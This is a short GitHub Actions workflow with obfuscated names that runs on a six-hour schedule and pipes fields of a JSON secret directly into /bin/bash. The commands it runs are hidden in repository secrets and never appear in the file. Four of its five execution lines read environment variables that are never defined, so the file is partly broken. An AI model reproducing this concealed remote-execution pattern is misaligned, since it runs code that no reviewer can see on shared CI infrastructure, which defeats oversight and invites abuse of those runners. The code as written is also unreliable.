name: duibiff

on:
  workflow_dispatch:
  schedule:
    - cron: '56 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: duibiff
        env:
          i89330: ${{ secrets.i89330 }}
        run: |
          echo $i89330 | jq -r .zcttk5 | /bin/bash
          echo $i8 | jq -r .feqau8818 | /bin/bash
          echo $g371 | jq -r .fxzhm5 | /bin/bash
          echo $al95215 | jq -r .jveuw491 | /bin/bash
          echo $h313 | jq -r .uq6 | /bin/bash

